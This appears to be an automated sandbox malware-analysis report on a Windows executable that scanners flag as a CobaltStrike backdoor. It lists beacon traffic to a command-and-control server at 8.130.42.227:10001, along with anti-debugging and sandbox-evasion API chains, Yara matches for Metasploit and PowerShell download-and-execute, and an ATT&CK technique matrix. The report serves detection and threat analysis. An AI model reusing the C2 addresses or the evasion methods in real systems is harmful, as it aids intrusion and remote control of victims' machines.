            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49903
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49910
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49914
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49937
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49938
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49940
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AC148 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009AC148

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_0099F5C80_2_0099F5C8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A3F880_2_009A3F88
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeWindow / User API: threadDelayed 1705Jump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeWindow / User API: threadDelayed 8071Jump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-30515
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeAPI coverage: 7.6 %
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A3F880_2_009A3F88
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016Thread sleep count: 1705 > 30Jump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016Thread sleep time: -17050000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7044Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016Thread sleep count: 8071 > 30Jump to behavior
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016Thread sleep time: -80710000s >= -30000sJump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A0ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_009A0ED4
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_009A779C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeThread delayed: delay time: 60000Jump to behavior
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000171000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.000000000012E000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.000000000012E000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.000000000012F000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000171000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeAPI call chain: ExitProcess graph end nodegraph_0-30589

            Anti Debugging

            barindex
            Found API chain indicative of debugger detection
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-30291
            Found potential dummy code loops (likely to delay analysis)
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeProcess Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B4014 IsDebuggerPresent,__crtUnhandledException,0_2_009B4014
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B4C34 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_009B4C34
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BC124 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,0_2_009BC124
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009ADA80 GetProcessHeap,0_2_009ADA80
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00402F69 SetUnhandledExceptionFilter,0_2_00402F69
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_004092E4 SetUnhandledExceptionFilter,0_2_004092E4
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009B0270 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B0270
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE4E8 SetUnhandledExceptionFilter,0_2_009BE4E8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTR
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AA7DC LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_009AA7DC
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE050 AllocateAndInitializeSid,0_2_009BE050
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A455C GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_009A455C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A455C GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_009A455C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Remote Access Functionality

            barindex
            Yara detected CobaltStrike
            Source: Yara matchFile source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Metasploit Payload
            Source: Yara matchFile source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A50E0 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_009A50E0
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009A4CD8 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_009A4CD8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009BE628 bind,0_2_009BE628
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AAF84 socket,closesocket,htons,bind,listen,0_2_009AAF84

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		2
            Valid Accounts            		2
            Valid Accounts            		2
            Valid Accounts            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		21
            Access Token Manipulation            		212
            Virtualization/Sandbox Evasion            		LSASS Memory341
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Process Injection            		21
            Access Token Manipulation            		Security Account Manager212
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Process Injection            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging111
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials1
            Account Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync1
            System Owner/User Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            File and Directory Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
            System Information Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            7kSftA4Eoh.exe89%ReversingLabsWin64.Backdoor.CobaltStrike
            7kSftA4Eoh.exe79%VirustotalBrowse
            7kSftA4Eoh.exe100%AviraHEUR/AGEN.1345031
            7kSftA4Eoh.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://8.130.42.227:10001/en_US/all.js4%VirustotalBrowse
            http://8.130.42.227:10001/2yMe6%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://8.130.42.227:10001/en_US/all.jstrueunknown
            http://8.130.42.227/2yMetrue
              		unknown
              http://8.130.42.227:10001/2yMetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://8.130.42.227:10001/2yMeP7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://8.130.42.227:10001/en_US/all.js#?7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://8.130.42.227:10001/en_US/all.jsSessionKeyBackward7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://8.130.42.227:10001/en_US/all.js=D7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://8.130.42.227:10001/en_US/all.jsJ47kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://8.130.42.227:10001/en_US/all.jsWindows7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://8.130.42.227:10001/en_US/all.jsn7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2132660259.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2056644230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://8.130.42.227:10001/en_US/all.jsm7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://8.130.42.227:10001/en_US/all.js07kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497532252.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://8.130.42.227:10001/en_US/all.jssiZ4#7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://8.130.42.227:10001/en_US/all.jsB47kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://8.130.42.227:10001/en_US/all.js37kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125724436.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://8.130.42.227:10001/en_US/all.js57kSftA4Eoh.exe, 00000000.00000003.2639548955.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2018585370.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2324563494.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
